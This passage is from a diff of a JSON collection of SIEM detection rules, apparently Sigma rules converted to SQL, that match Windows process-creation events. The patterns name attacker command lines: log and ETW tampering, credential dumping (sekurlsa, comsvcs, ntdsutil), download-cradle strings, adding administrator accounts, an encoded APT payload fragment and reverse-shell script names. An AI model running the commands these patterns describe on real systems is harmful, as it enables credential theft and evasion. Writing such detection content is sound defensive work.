FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_etw_trace_evasion.yml" + "filename": "proc_creation_win_fltmc_unload_driver.yml" }, { - "title": "TAIDOOR RAT DLL Load", - "id": "d1aa3382-abab-446f-96ea-4de52908210b", - "status": "test", - "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", + "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "status": "experimental", + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1055.001" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Other legitimate network 
providers used and not filtred in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_taidoor.yml" + "filename": "proc_creation_win_registry_new_network_provider.yml" }, { - "title": "Potential BearLPE Exploitation", - "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", - "status": "test", - "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", - "author": "Olaf Hartong", + "title": "PUA - NSudo Execution", + "id": "771d1eb5-9587-4568-95fb-9ec44153a012", + "status": "experimental", + "description": "Detects the use of NSudo tool for command execution", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.privilege_escalation", - "attack.t1053.005", - "car.2013-08-001" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_other_bearlpe.yml" + "filename": "proc_creation_win_pua_nsudo.yml" }, { - "title": "RunDLL32 Spawning Explorer", - "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", + "title": "Suspicious Regsvr32 HTTP IP Pattern", + "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", "status": "experimental", - "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", - "author": "elhoim, CD_ROM_", + "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1218.010" ], "falsepositives": [ - "Unknown" + "FQDNs that start with a number" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND 
CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_spawn_explorer.yml" + "filename": "proc_creation_win_regsvr32_http_pattern.yml" }, { - "title": "Potential CVE-2022-29072 Exploitation Attempt", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", + "title": "Unusual Child Process of dns.exe", + "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", "status": "experimental", - "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. 
This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", - "author": "frack113", + "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "cve.2022.29072" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" + "filename": "proc_creation_win_dns_susp_child_process.yml" }, { - "title": "HackTool - SafetyKatz Execution", - "id": "b1876533-4ed5-4a83-90f3-b8645840a413", + "title": "PUA- IOX Tunneling Tool Execution", + "id": "d7654f02-e04b-4934-9838-65c46f187ebc", "status": "experimental", - "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * 
FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" ], - "filename": "proc_creation_win_hktl_safetykatz.yml" + "filename": "proc_creation_win_pua_iox.yml" }, { - "title": "Windows Defender Download Activity", - "id": "46123129-1024-423e-9fae-43af4a0fa9a5", - "status": "test", - "description": "Detect the use of Windows Defender to download payloads", - "author": "Matthew Matchen", + "title": "MERCURY APT Activity", + "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", + "status": "experimental", + "description": "Detects suspicious command line patterns seen being used by MERCURY APT", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1059.001", + "attack.g0069" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE 
'\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" + "filename": "proc_creation_win_apt_mercury.yml" }, { - "title": "Exploiting CVE-2019-1388", - "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", - "status": "stable", - "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", + "title": "Webshell Hacking Activity Patterns", + "id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", + "status": "experimental", + "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE 
'%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adfind.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE 
'%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2019_1388.yml" + "filename": "proc_creation_win_webshell_hacking.yml" }, { - "title": "Suspicious Outlook Child Process", - "id": "208748f7-881d-47ac-a29c-07ea84bf691d", + "title": "Remote Access Tool - AnyDesk Silent Installation", + "id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", "status": "test", - "description": "Detects a suspicious process spawning from an Outlook process.", - "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", + "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", + "author": "Ján Trenčanský", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate deployment of AnyDesk" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" }, { - "title": "Parent in Public Folder Suspicious Process", - "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", - "status": "experimental", - "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "title": "Suspicious HWP Sub Processes", + "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", + "status": "test", + "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.initial_access", + "attack.t1566.001", + "attack.execution", + "attack.t1203", + "attack.t1059.003", + "attack.g0032" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE 
'%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\gbb.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" + "filename": "proc_creation_win_hwp_exploits.yml" }, { - "title": "Potential Dridex Activity", - "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", - "status": "stable", - "description": "Detects potential Dridex acitvity via specific process patterns", - "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Uninstall Sysinternals Sysmon", + "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", + "status": "test", + "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055", - "attack.discovery", - "attack.t1135", - "attack.t1033" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% view%' ESCAPE '\\')))))" + "attack.t1562.001" ], - "filename": "proc_creation_win_malware_dridex.yml" - }, - { - "title": "Suspicious Program Names", - "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", - "status": "test", - "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", - "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate tools that accidentally match on the searched patterns" + "Legitimate administrators might use this command to remove Sysmon for debugging purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\CVE-202%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CVE202%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\poc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfuscated.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfusc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE 
'\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_progname.yml" + "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml" }, { - "title": "Potential Conti Ransomware Database Dumping Activity", - "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", + "title": "Invoke-Obfuscation Via Use MSHTA", + "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", "status": "test", - "description": "Detects a command used by conti to dump database", - "author": "frack113", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE 
'%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "PUA - NSudo Execution", - "id": "771d1eb5-9587-4568-95fb-9ec44153a012", + "title": "Add SafeBoot Keys Via Reg Utility", + "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", "status": "experimental", - "description": "Detects the use of NSudo tool for command execution", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. 
